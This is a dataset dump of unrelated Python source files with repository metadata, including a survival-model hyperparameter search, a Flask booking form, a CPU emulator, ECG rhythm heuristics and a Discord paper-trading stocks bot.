[32, 64, 128] # mb_size\n\n SET_LAYERS = [1, 2, 3, 5] # number of layers\n SET_NODES = [50, 100, 200, 300] # number of nodes\n\n SET_ACTIVATION_FN = ['relu', 'elu', 'tanh'] # non-linear activation functions\n\n SET_ALPHA = [0.1, 0.5, 1.0, 3.0, 5.0] # alpha values -> log-likelihood loss\n SET_BETA = [0.1, 0.5, 1.0, 3.0, 5.0] # beta values -> ranking loss\n SET_GAMMA = [0.1, 0.5, 1.0, 3.0, 5.0] # gamma values -> calibration loss\n\n 
new_parser = {'mb_size': SET_BATCH_SIZE[np.random.randint(len(SET_BATCH_SIZE))],\n\n 'iteration': 50000,\n\n 'keep_prob': 0.6,\n 'lr_train': 1e-4,\n\n 'h_dim_shared': SET_NODES[np.random.randint(len(SET_NODES))],\n 'h_dim_CS': SET_NODES[np.random.randint(len(SET_NODES))],\n 'num_layers_shared': SET_LAYERS[np.random.randint(len(SET_LAYERS))],\n 'num_layers_CS': SET_LAYERS[np.random.randint(len(SET_LAYERS))],\n 'active_fn': SET_ACTIVATION_FN[np.random.randint(len(SET_ACTIVATION_FN))],\n\n 'alpha': 1.0, # default (set alpha = 1.0 and change beta and gamma)\n 'beta': SET_BETA[np.random.randint(len(SET_BETA))],\n 'gamma': 0, # default (no calibration loss)\n # 'alpha':SET_ALPHA[np.random.randint(len(SET_ALPHA))],\n # 'beta':SET_BETA[np.random.randint(len(SET_BETA))],\n # 'gamma':SET_GAMMA[np.random.randint(len(SET_GAMMA))],\n\n 'out_path': out_path}\n\n return new_parser # outputs the dictionary of the randomly-chosen hyperparamters\n\n##### MAIN SETTING\nOUT_ITERATION = 1\nRS_ITERATION = 20\n\ndata_mode = 'MZZ_200_5' # 'SYNTHETIC''METABRIC'\nseed = 1234\n\n##### IMPORT DATASET\n'''\n num_Category = typically, max event/censoring time * 1.2 (to make enough time horizon)\n num_Event = number of evetns i.e. len(nap.unique(label))-1\n max_length = maximum number of measurements\n x_dim = data dimension including delta (num_features)\n mask1, mask2 = used for cause-specific network (FCNet structure)\n\n EVAL_TIMES = set specific evaluation time horizons at which the validatoin performance is maximized. \n \t\t\t\t\t\t (This must be selected based on the dataset)\n'''\n\n\ndef run_experiment(data_mode):\n\n if data_mode == 'SYNTHETIC':\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_dataset_SYNTHETIC(norm_mode='standard')\n EVAL_TIMES = [12, 24, 36]\n elif data_mode == 'METABRIC':\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_dataset_METABRIC(norm_mode='standard')\n EVAL_TIMES = [144, 288, 432]\n elif data_mode[0:3] == 'MZZ':\n first_ = data_mode.find(\"_\")\n second_ = data_mode[first_+1:].find(\"_\") + first_ +1\n num_samples = data_mode[first_+1: second_]\n num_features = data_mode[second_+1:]\n (x_dim), (data, time, label), (mask1, mask2) = impt.import_mzz_SYNTHETIC(num_samples=num_samples, num_features = num_features, norm_mode='standard')\n EVAL_TIMES = [50, 100, int(max(time))]\n else:\n print('ERROR: DATA_MODE NOT FOUND !!!')\n\n DATA = (data, time, label)\n MASK = (mask1, mask2) # masks are required to calculate loss functions without for-loops.\n\n out_path = os.path.join('experiments', data_mode, 'results')\n #out_path = data_mode + '/results/'\n for itr in range(OUT_ITERATION):\n\n if not os.path.exists(out_path + '/itr_' + str(itr) + '/'):\n os.makedirs(out_path + '/itr_' + str(itr) + '/')\n\n max_valid = 0.\n max_valid_list = []\n log_name = out_path + '/itr_' + str(itr) + '/hyperparameters_log.txt'\n\n for r_itr in range(RS_ITERATION):\n print('OUTER_ITERATION: ' + str(itr))\n print('Random search... 
itr: ' + str(r_itr))\n new_parser = get_random_hyperparameters(out_path)\n print(new_parser)\n\n # get validation performance given the hyper - parameters\n tmp_max = get_main.get_valid_performance(DATA, MASK, new_parser, itr, EVAL_TIMES, MAX_VALUE=max_valid)\n if tmp_max > max_valid:\n max_valid = tmp_max\n max_parser = new_parser\n save_logging(max_parser, log_name) # save the hyperparameters if this provides the maximum validation performance\n print('Current best: ' + str(max_valid))\n max_valid_list.append(max_valid)\n\n\n result_fpath = os.path.join(out_path, 'itr_' + str(itr), 'performance.txt' )\n with open(result_fpath, 'w') as f:\n f.write('Max:{}\\n'.format( np.max(max_valid) ) )\n f.write('Std:{}\\n'.format( np.std(max_valid_list)))\n print(np.max(max_valid))\n print(np.std(max_valid_list))\n\n\nif __name__ == '__main__':\n\n data_mode_list = ['MZZ_200_3', 'MZZ_200_5', 'MZZ_200_10',\n 'MZZ_500_3', 'MZZ_500_5', 'MZZ_500_10',\n 'MZZ_750_3', 'MZZ_750_5', 'MZZ_750_10',\n 'MZZ_1000_3', 'MZZ_1000_5', 'MZZ_1000_10',\n 'MZZ_2000_3', 'MZZ_2000_5', 'MZZ_2000_10',\n 'MZZ_5000_3', 'MZZ_5000_5', 'MZZ_5000_10'\n ]\n\n for data_mode in data_mode_list:\n run_experiment(data_mode)\n","sub_path":"main_RandomSearch.py","file_name":"main_RandomSearch.py","file_ext":"py","file_size_in_byte":7266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"112917495","text":"from flask import Blueprint, render_template, redirect, url_for, request, flash\nfrom pymongo import MongoClient\nfrom ssl_decorators import no_ssl_required\nfrom smtplib import SMTP\nfrom email.mime.text import MIMEText\n\nblueprint = Blueprint('book_event', __name__)\n\n@blueprint.route('/bookevent', methods=['GET','POST'])\n@no_ssl_required\ndef view():\n if request.method == 'POST':\n book_request = \"Name: \" + request.form['name'] + \"\\n\"\n book_request += \"Phone number: \" + request.form['phone'] + \"\\n\"\n book_request += \"Reason: \" + request.form['reason'] + \"\\n\"\n book_request += \"Location: \" + request.form['location'] + \"\\n\"\n book_request += \"Secrecy level: \" + request.form['secrecylevel'] + \"\\n\"\n book_request += \"Number of people: \" + request.form['numpeople'] + \"\\n\"\n book_request += \"Budget: \" + request.form['budget']\n\n msg = MIMEText(book_request)\n msg['Subject'] = \"Booking request\"\n msg['From'] = \"Off The Grid booking\"\n msg['To'] = \"kwyatt187@gmail.com\"\n \n s = SMTP('localhost')\n s.sendmail(\"Off_The_Grid_booking@offthegridadvertising.com\", [\"kwyatt187@gmail.com\"], msg.as_string())\n s.quit()\n flash('Booking request sent')\n return redirect(url_for('book_event.view'))\n else:\n db = MongoClient().offTheGrid\n locations = db.locations.find().sort([(\"name\" , 1)])\n return render_template('bookevent.html', locations=locations)\n","sub_path":"views/book_event.py","file_name":"book_event.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"178158525","text":"import os\nimport pickle\n\ndef read(path):\n data = {}\n if os.path.exists(path):\n with open(path, 'rb') as f:\n data = pickle.load(f)\n return data\n\ndef save(path,data):\n with open(path, 'wb') as f:\n pickle.dump(data, f, True)\n\n","sub_path":"pkl.py","file_name":"pkl.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"554257540","text":"#Types.\nfrom typing import Dict, List, 
Any\n\n#Transaction classs.\nfrom PythonTests.Classes.Transactions.Transaction import Transaction\n\n#BLS lib.\nimport blspy\n\n#Blake2b standard function.\nfrom hashlib import blake2b\n\n#Claim class.\nclass Claim(Transaction):\n #Constructor.\n def __init__(\n self,\n inputs: List[bytes],\n output: bytes,\n signature: bytes = bytes(96)\n ) -> None:\n self.inputs: List[bytes] = inputs\n self.output: bytes = output\n self.amount: int = 0\n\n self.signature: bytes = signature\n self.hash = blake2b(b'\\1' + self.signature, digest_size=48).digest()\n\n self.verified: bool = False\n\n #Transaction -> Claim. Satisifes static typing requirements.\n @staticmethod\n def fromTransaction(\n tx: Transaction\n ) -> Any:\n return tx\n\n #Sign.\n def sign(\n self,\n privKeys: List[blspy.PrivateKey]\n ) -> None:\n signatures: List[blspy.Signature] = [\n privKeys[0].sign(b'\\1' + self.inputs[0] + self.output)\n ]\n\n for i in range(1, len(self.inputs)):\n signatures.append(privKeys[i].sign(b'\\1' + self.inputs[i] + self.output))\n\n self.signature = blspy.Signature.aggregate(signatures).serialize()\n self.hash = blake2b(b'\\1' + self.signature, digest_size=48).digest()\n\n #Serialize.\n def serialize(\n self\n ) -> bytes:\n result: bytes = len(self.inputs).to_bytes(1, \"big\")\n for txInput in self.inputs:\n result += txInput\n result += self.output + self.signature\n return result\n\n #Claim -> JSON.\n def toJSON(\n self\n ) -> Dict[str, Any]:\n if self.amount == 0:\n raise Exception(\"Python tests didn't set this Claim's value.\")\n\n result: Dict[str, Any] = {\n \"descendant\": \"Claim\",\n \"inputs\": [],\n \"outputs\": [{\n \"key\": self.output.hex().upper(),\n \"amount\": str(self.amount)\n }],\n\n \"signature\": self.signature.hex().upper(),\n \"hash\": self.hash.hex().upper()\n }\n for txInput in self.inputs:\n result[\"inputs\"].append({\n \"hash\": txInput.hex().upper()\n })\n return result\n\n #Claim -> JSON with verified field.\n def toVector(\n self,\n ) -> Dict[str, Any]:\n result = self.toJSON()\n result[\"verified\"] = self.verified\n return result\n\n #JSON -> Claim.\n @staticmethod\n def fromJSON(\n json: Dict[str, Any]\n ) -> Any:\n inputs: List[bytes] = []\n for txInput in json[\"inputs\"]:\n inputs.append(bytes.fromhex(txInput[\"hash\"]))\n\n result: Claim = Claim(\n inputs,\n bytes.fromhex(json[\"outputs\"][0][\"key\"]),\n bytes.fromhex(json[\"signature\"])\n )\n result.amount = int(json[\"outputs\"][0][\"amount\"])\n if json[\"verified\"]:\n result.verified = True\n return result\n","sub_path":"PythonTests/Classes/Transactions/Claim.py","file_name":"Claim.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"448130786","text":"# coding: utf-8\n\nimport os.path as op\nimport numpy as np\nimport pandas as pd\nfrom pandas.api.types import CategoricalDtype as cdtype\n\nRENAME_COLS = dict(PATNO='PARTICIPANT',\n EVENT_ID='VISIT')\nASSIGN_COLS = dict(PAG_NAME='DATSCAN',\n VISIT_DATE=np.nan)\nRETAIN_COLS = ['PARTICIPANT', 'PAG_NAME', 'VISIT',\n 'VISIT_DATE', 'TEST', 'SCORE']\n\n\ndef get_data(fpath):\n \"\"\"\n Gets DaTscan data for PPMI subjects\n\n Parameters\n ----------\n fname : str\n Filepath to directory containing DaTScan_Analysis.csv file\n\n Returns\n -------\n data : pandas.core.frame.DataFrame\n DaTScan data\n \"\"\"\n\n visits = ['SC', 'BL', 'V01', 'V02', 'V03', 'V04', 'V05', 'V06', 'V07',\n 'V08', 'V09', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15']\n dtype = dict(PATNO=str,\n 
EVENT_ID=cdtype(visits, ordered=True))\n\n fname = op.join(fpath, 'DATScan_Analysis.csv')\n data = pd.read_csv(fname, dtype=dtype)\n\n # melt into tidy DataFrame\n data = pd.melt(data.rename(columns=RENAME_COLS),\n id_vars=RENAME_COLS.values(),\n var_name='TEST', value_name='SCORE')\n data = data.dropna(axis=0, subset=['SCORE'])\n data = data.assign(**ASSIGN_COLS)[RETAIN_COLS]\n\n return data\n","sub_path":"ppmi/datasets/datscan.py","file_name":"datscan.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"159198173","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256\n self.reg = [0] * 8\n self.reg[7] = 0xF4 # set the last reg to the sp\n self.pc = 0\n\n # op codes and handler\n self.handler = {\n 0b10100000: self.handle_ADD,\n 0b01010000: self.handle_CALL,\n 0b00000001: self.handle_HLT,\n 0b10000010: self.handle_LDI,\n 0b10100010: self.handle_MUL,\n 0b01000110: self.handle_POP,\n 0b01000111: self.handle_PRN,\n 0b01000101: self.handle_PUSH,\n 0b00010001: self.handle_RET\n }\n\n def load(self, file):\n \"\"\"Load a program into memory.\"\"\"\n\n address = 0\n\n with open(file) as f:\n lines = f.readlines()\n lines = [\n line for line in lines if line.startswith('0') or line.startswith('1')\n ]\n program = [int(line[:8], 2) for line in lines]\n\n for instruction in program:\n self.ram[address] = instruction\n address += 1\n\n def handle_instructions(self, op, reg_a, reg_b):\n \"\"\"CU operations.\"\"\"\n try:\n self.handler[op](reg_a, reg_b)\n except KeyError:\n raise Exception(\"No such op code\")\n\n def handle_ADD(self, reg_a, reg_b):\n self.reg[reg_a] += self.reg[reg_b]\n self.pc += 3\n \n def handle_CALL(self, reg_a, reg_b):\n self.reg[7] -= 1\n self.ram_write(self.pc + 2, self.reg[7])\n self.pc = self.reg[reg_a]\n\n def handle_HLT(self, reg_a, reg_b):\n self.pc += 1\n self.running = False\n\n def handle_LDI(self, reg_a, reg_b):\n self.reg[reg_a] = reg_b\n self.pc += 3\n\n def handle_MUL(self, reg_a, reg_b):\n self.reg[reg_a] = (self.reg[reg_a] * self.reg[reg_b])\n self.pc += 3\n\n def handle_POP(self, reg_a, reg_b):\n self.reg[reg_a] = self.ram_read(self.reg[7])\n self.reg[7] += 1\n self.pc += 2\n return self.reg[reg_a]\n\n def handle_PRN(self, reg_a, reg_b):\n print(self.reg[reg_a])\n self.pc += 2\n\n def handle_PUSH(self, reg_a, reg_b):\n self.reg[7] -= 1\n self.ram_write(self.reg[reg_a], self.reg[7])\n self.pc += 2\n\n def handle_RET(self, reg_a, reg_b):\n self.pc = self.ram_read(self.reg[7])\n self.reg[7] += 1\n \n\n def ram_read(self, address):\n return self.ram[address]\n\n def ram_write(self, value, address):\n self.ram[address] = value\n\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. 
You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n # self.fl,\n # self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n\n print()\n\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n\n # set exit condition\n self.running = True\n\n # while loop\n while self.running:\n\n IR = self.ram_read(self.pc)\n operand_a = self.ram_read(self.pc + 1)\n operand_b = self.ram_read(self.pc + 2)\n\n self.handle_instructions(IR, operand_a, operand_b)\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"156013537","text":"#On my honor,as an Aggie, I have neither given nor received unauthorized aid on this academic work. An Aggie does not\r\n#lie, cheat or steal, or tolerate those who do\r\n\r\n\r\nfrom scipy.signal import find_peaks\r\n\r\n# this function diagnoses AV block first degree\r\ndef AV_firstdegree(PRinterval):\r\n # if there are no corresponding PR intervals for calculations, AV first degree is not the diagnosis\r\n if PRinterval == 0:\r\n value = False\r\n\r\n # AV first degree is diagnosed through a PR interval greater than .2 sec\r\n # the average of the PR intervals are used to determine if the interval exceeds .2 sec\r\n else:\r\n PRinterval = sum(PRinterval)/len(PRinterval)\r\n if PRinterval > .2:\r\n value = True\r\n else:\r\n value = False\r\n return value\r\n\r\n# this function diagnoses AV block second degree\r\ndef AV_seconddegree(PPinterval,RRinterval):\r\n # AV block second degree is diagnosed when there are missing QRS complexes\r\n\r\n # if there are no P waves or R waves diagnosis should be false\r\n if len(PPinterval) == 0 or len(RRinterval) == 0:\r\n diagnosis = False\r\n\r\n # if there are QRS complexes missing, the number of P intervals should be considerably bigger\r\n elif (len(PPinterval) - len(RRinterval)) > 2:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses tachycardia\r\ndef sinus_tachycardia (bpm):\r\n # tachycardia is diagnosed when the heart rate is over 100 bpm\r\n if bpm > 100:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses bradycardia\r\ndef sinus_bradycardia (bpm):\r\n # bradycardia is diagnosed when the heart rate is less than 60 bpm\r\n if bpm < 60:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses arrythmia\r\ndef arrythmia(PPinterval,RRinterval):\r\n # if any value of the RR interval is greater than 1, the diagnosis is false\r\n x = 0\r\n r = []\r\n # while loop looks for the values over 1 and append them to the r list\r\n while x != len(RRinterval):\r\n y = RRinterval[x]\r\n if y > 1:\r\n r.append(y)\r\n x += 1\r\n else:\r\n x += 1\r\n if len(r) > 0:\r\n diagnosis = False\r\n else:\r\n # if there are no PP intervals or RR interval, the diagnosis is false\r\n if len(PPinterval)==0 or len(RRinterval)==0:\r\n diagnosis = False\r\n else:\r\n # one way of diagnosing is finding the difference between the greatest PP interval and the smallest PP interval\r\n # the interval must be greater than .16\r\n max_interval = max(PPinterval)\r\n min_interval = min(PPinterval)\r\n PPinterval = max_interval - min_interval\r\n\r\n # another way of diagnosing is finding 
the difference between the greatest RR interval and the smallest RR interval\r\n # the interval must be greater than .16\r\n max_interval1 = max(RRinterval)\r\n min_interval1 = min(RRinterval)\r\n RRinterval = max_interval1 - min_interval1\r\n\r\n #if any of the two intervals are greater than .16, the diagnosis is true\r\n if PPinterval > .16 or RRinterval > .16:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis\r\n\r\n# this function diagnoses bundle branch block\r\ndef bundle_branch(QRS_interval,voltage):\r\n # to diagnose bundle branch block, the length of the QRS complex must be greater than .12 sec\r\n # the average of the QRS complexes is used to determine if it is greater than .12 sec\r\n QRS_interval = sum(QRS_interval)/len(QRS_interval)\r\n P_peaks, _ = find_peaks(voltage, height=(.25, .4))\r\n\r\n # if there are no P waves, diagnosis is false\r\n if len(P_peaks) == 0:\r\n value = False\r\n #if the average is greater than .12, the diagnosis is true\r\n elif QRS_interval>.120:\r\n value = True\r\n else:\r\n value = False\r\n return value\r\n\r\ndef atrial_fibrillation(voltage):\r\n # findpeaks is used to first find the P waves\r\n P_peaks, _ = find_peaks(voltage, height=(.25, .4))\r\n # when diagnosing atrial fibrillation, there are usually no P waves\r\n if len(P_peaks) == 0:\r\n diagnosis = True\r\n else:\r\n diagnosis = False\r\n return diagnosis","sub_path":"Diseases.py","file_name":"Diseases.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208396287","text":"import discord, os, operator, threading, time\nfrom discord.ext import commands, tasks\nfrom ledger import Ledger\nfrom stocks import (\n YahooFinance,\n PolygonRest,\n)\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport pandas as pd\nfrom datetime import datetime\nfrom config import TOKEN\n\nledger = Ledger('data.json')\nstocks = PolygonRest()\nintents = discord.Intents.default()\nintents.members = True\ncommand_prefix = \"!\"\nbot = commands.Bot(command_prefix=command_prefix, intents=intents)\nbot.remove_command('help')\nembed_color = 0x00ff00\n\ndef rnd(f):\n return round(f, 2)\n\ndef sdate():\n return str(datetime.now())[:19]\n\ndef add_embed(title=None, description=None, fields=None, inline=False, ctx=None,\n author=None, image=None, footer=None, timestamp=None, color=embed_color):\n embed = discord.Embed(\n title=title,\n description=description,\n color=color,\n )\n if fields != None:\n for name, value in fields:\n embed.add_field(\n name=name,\n value=value,\n inline=inline,\n )\n if author != None:\n embed.set_author(name=author.name, icon_url=author.avatar_url)\n if image != None:\n embed.set_image(url=image)\n if footer != None:\n embed.set_footer(text=footer)\n if timestamp != None:\n embed.set_timestamp(timestamp)\n return embed\n\n@bot.command()\nasync def help(ctx):\n fields = [\n ('!add', 'Sign up for StocksBot'),\n ('!buy (type) (symbol) (amount)', 'To purchase shares ex. !buy cash AAPL 1000'),\n ('!sell (type) (symbol) (amount)', 'To sell shares ex. !sell qty TSLA 1000'),\n ('!liquidate', 'To liquidate all assets'),\n ('!portfolio (id)', 'To view all your assets'),\n ('!stock (symbol)', 'To view the stock trend of a specific company ex. !stock AMZN'),\n ('!lookup (company name)', 'To get the information of a specific company ex. 
!lookup Starbucks'),\n ]\n embed = add_embed('Help', description='Descriptions for all the commmands', fields=fields)\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def echo(ctx, *, content:str):\n print(ctx.author)\n await ctx.send(content)\n\n\n# @bot.command()\n# async def add(ctx):\n# id = ctx.author.id\n# name = ctx.author.name\n# if (ledger.contains(id)):\n# embed = add_embed('StocksBot', 'Error: Already registered with StocksBot!', color=0xFF0000, author=ctx.author)\n# else:\n# ledger.add_user(id, name)\n# embed = add_embed('StocksBot', 'You have been added to StocksBot!', author=ctx.author)\n# await ctx.send(embed=embed)\n\n@bot.command()\nasync def buy(ctx, type:str, symbol:str, amount:str):\n symbol = symbol.upper()\n id = str(ctx.author.id)\n name = ctx.author.name\n try:\n price = stocks.latest_price(symbol)\n if price == None:\n raise\n except:\n embed = add_embed(f'\"{symbol}\" couldn\\'t be found', author=ctx.author)\n await ctx.send(embed=embed)\n return\n if amount == 'all':\n qty = None\n elif type == 'cash':\n qty = float(amount)/price\n elif type == 'qty':\n qty = float(amount)\n else:\n await ctx.send(f'Invalid Command {ctx.author.mention}')\n\n if qty != None and qty < .1:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} need to buy more than .1 shares', author=ctx.author)\n await ctx.send(embed=embed)\n return\n pqty = ledger.enter_position(str(id), 'long', symbol, price, qty)\n if pqty == False:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} error processing transaction! (Maybe Overbought)', author=ctx.author)\n await ctx.send(embed=embed)\n else:\n fields = [\n ('Share Price', f'${rnd(price)}'),\n ('Quantity', f'{rnd(pqty)} shares'),\n ('Worth', f'${rnd(pqty * price)}')\n ]\n footer = f'Transaction at {sdate()}'\n embed = add_embed(f'Bought {symbol}', f'Remaining Balance: ${rnd(ledger.get_balance(id))}' , fields=fields, author=ctx.author, inline=True, footer=footer)\n await ctx.send(embed=embed)\n\n@bot.command()\nasync def sell(ctx, type:str, symbol:str, amount:str):\n symbol = symbol.upper()\n id = str(ctx.author.id)\n name = ctx.author.name\n price = stocks.latest_price(symbol)\n try:\n price = stocks.latest_price(symbol)\n if price == None:\n raise\n except:\n embed = add_embed(f'\"{symbol}\" couldn\\'t be found', author=ctx.author)\n await ctx.send(embed=embed)\n return\n if amount == 'all':\n qty = None\n elif type == 'cash':\n qty = float(amount)/price\n elif type == 'qty':\n qty = float(amount)\n else:\n await ctx.send(f'Invalid Command {ctx.author.mention}')\n\n if qty != None and qty < .1:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} need to sell more than .1 shares', author=ctx.author)\n await ctx.send(embed=embed)\n return\n pqty = ledger.exit_position(id, 'sell', symbol, price, qty)\n if pqty == False:\n embed = add_embed('Error in Transaction', f'{ctx.author.mention} error processing transaction! 
(Maybe Oversold)', author=ctx.author)\n await ctx.send(embed=embed)\n else:\n fields = [\n ('Share Price', f'${rnd(price)}'),\n ('Quantity', f'{rnd(pqty)} shares'),\n ('Worth', f'${rnd(pqty * price)}')\n ]\n footer = f'Transaction at {sdate()}'\n embed = add_embed(f'Sold {symbol}', f'Remaining Balance: ${rnd(ledger.get_balance(id))}', fields=fields, author=ctx.author, inline=True, footer=footer)\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def stock(ctx, symbol:str):\n symbol = symbol.upper()\n try:\n price = stocks.latest_price(symbol)\n except:\n embed = add_embed(f'Could\\'t find information for \"{symbol}\"', 'check spelling and symbol!')\n await ctx.send(embed=embed)\n return\n open, high, low = stocks.get_stats(symbol)\n trend = rnd(price-open)\n trend_perc = rnd((price-open)/open*100)\n if trend > 0:\n trend = f'+${trend}'\n trend_perc = f'+{trend_perc}%'\n else:\n trend = f'-${abs(trend)}'\n trend_perc = f'-{abs(trend_perc)}%'\n fields = [\n ('Current Price', f'${price}'),\n ('Open Price', f'${open}'),\n ('High Price', f'${high}'),\n ('Low Price', f'${low}'),\n ('Trend Today', trend),\n ('Trend Today %', trend_perc),\n ]\n o, h, l, c = stocks.get_aggregate(symbol)\n layout = go.Layout(\n paper_bgcolor='rgba(0,0,0,0)',\n plot_bgcolor='rgba(0,0,0,0)',\n width=1200,\n height=800,\n xaxis=go.layout.XAxis(\n showticklabels=False\n ),\n yaxis=go.layout.YAxis(\n color=\"white\"\n )\n )\n fig = go.Figure(data=[go.Candlestick(open=o, high=h, low=l, close=c)], layout=layout)\n fig.update_layout(xaxis_rangeslider_visible=False)\n fig.write_image(\"images/\" + symbol + \".png\")\n file = discord.File(\"images/\" + symbol + \".png\", filename='image.png')\n embed = add_embed(title=symbol, description=f'Stats as of ({sdate()})', fields=fields, author=ctx.author, inline=True, image='attachment://image.png')\n await ctx.send(file=file, embed=embed)\n os.remove('images/' + symbol + '.png')\n\n@bot.command()\nasync def liquidate(ctx):\n id = str(ctx.author.id)\n holdings = ledger.get_holdings(id)\n fields = []\n for symbol, qty in holdings:\n price = stocks.latest_price(symbol)\n ledger.exit_position(id, 'sell', symbol, price, qty)\n value = f'''\n {rnd(qty)} Shares\n ${rnd(qty * price)}\n '''\n fields.append((symbol, value))\n embed = add_embed(f'Portfolio Liquidated', fields=fields, author=ctx.author, inline=True)\n await ctx.send(embed=embed)\n\n@tasks.loop(seconds=30)\nasync def leaderboard():\n ports, i, fields = ledger.get_all_owned(), 1, []\n worths = {}\n for id in ports:\n worth = ledger.get_balance(id)\n for sym, qty in ports[id]:\n worth += qty * stocks.latest_price(sym)\n worths[id] = worth\n sorted_worths = sorted(worths.items(), key=operator.itemgetter(1))\n sorted_worths.reverse()\n for id, bal in sorted_worths:\n if i > 10: break\n user = await bot.fetch_user(int(id))\n fields.append((f'{i}: {user.name}', f'Net Worth: ${rnd(bal)}'))\n i += 1\n embed = add_embed(title='Leaderboard', fields=fields)\n for guild in bot.guilds:\n channel = discord.utils.get(guild.channels, name=\"leaderboard\")\n if channel == None:\n channel = await guild.create_text_channel('leaderboard')\n message_list = await channel.history(limit=1).flatten()\n if (len(message_list) == 0):\n await channel.send(embed=embed)\n else:\n try:\n await message_list[0].edit(embed=embed)\n except:\n await channel.purge(limit=100)\n await channel.send(embed=embed)\n\nasync def add_all():\n await bot.wait_until_ready()\n for user in bot.users:\n if not ledger.contains(user.id) and not user.bot:\n 
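The `!stock` command above renders a candlestick chart with Plotly and ships it as a Discord attachment. A stripped-down version of just the charting step, with hard-coded OHLC lists standing in for the Polygon data:

```python
import plotly.graph_objects as go

# Assumed toy OHLC data; the bot fills these from stocks.get_aggregate().
o, h, l, c = [10, 11, 12], [11, 13, 12.5], [9.5, 10.8, 11.2], [11, 12, 11.5]

fig = go.Figure(data=[go.Candlestick(open=o, high=h, low=l, close=c)])
fig.update_layout(xaxis_rangeslider_visible=False)  # hide the range slider, as above
fig.write_image("candles.png")  # static export needs the kaleido (or orca) backend
```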
ledger.add_user(user.id, user.name)\n\nadd_all()\nleaderboard.start()\n\n@bot.command()\nasync def portfolio(ctx):\n after = ctx.message.content.lower().split(\"portfolio\")[1]\n if (len(ctx.message.mentions) > 0):\n author = ctx.message.mentions[0]\n elif (len(after) > 2 and ctx.guild.get_member(int(after.split(' ')[1])) != None):\n author = ctx.guild.get_member(int(after.split(' ')[1]))\n else:\n author = ctx.author\n id = str(author.id)\n port = ledger.portfolio(id)\n fields = []\n cash_balance = ledger.get_balance(id)\n total_worth = cash_balance\n for sym, qty, ptype, price in port:\n current_price = stocks.latest_price(sym)\n if ptype == 'long':\n profit = rnd((current_price-price)*qty)\n profit_perc = rnd((current_price-price)/price*100)\n total_worth += current_price * qty\n else:\n total_worth += qty * (2 * price - current_price)\n profit = rnd((price-current_price)*qty)\n profit_perc = rnd((price-current_price)/price*100)\n value = f'''\n Shares: {rnd(qty)}\n Position: {ptype}\n Worth: ${rnd(current_price*qty)}‎‎‎‎‎‎‎‎‏‏‎‎‏‏‎‏‏‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎ ‎‏‏‎\n Profit: {profit}$\n Profit %: {profit_perc}%‏‏‎\n\n '''\n fields.append((f'{sym}', value))\n total_stats = f'''\n Net Worth: ${rnd(total_worth)}\n Cash Balance: ${rnd(cash_balance)}\n Total Profit:\n ${rnd(total_worth - 10e3)} | {rnd((total_worth - 10e3)/10e3 * 100)}%\n '''\n embed = add_embed(f'Portfolio', total_stats, fields=fields, inline=True, author=author)\n await ctx.send(embed=embed)\n\n\n@bot.command()\nasync def lookup(ctx):\n query = ctx.message.content.lower().split(\"lookup\")[1][1:]\n symbol = stocks.lookup(query)\n data = stocks.get_info(symbol)\n if data == False:\n embed = add_embed(f'Couldn\\'t find information for \"{query}\"', 'Make sure symbol exists!')\n await ctx.send(embed=embed)\n return\n fields = [\n ('Symbol', data['symbol']),\n ('Maket Cap', f'${data[\"marketcap\"]}'),\n ('Employees', data['employees']),\n ('Sector', data['sector']),\n ('Industry', data['industry']),\n ('Website', data['url'])\n ]\n embed = add_embed(data['name'], 'Basic Infomation', fields=fields, image=data['logo'], inline=True)\n await ctx.send(embed=embed)\n\n\nbot.run(TOKEN)\n","sub_path":"events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":11947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"177041675","text":"''' Crie um programa onde 4 jogadores joguem um dado e tenham resultados 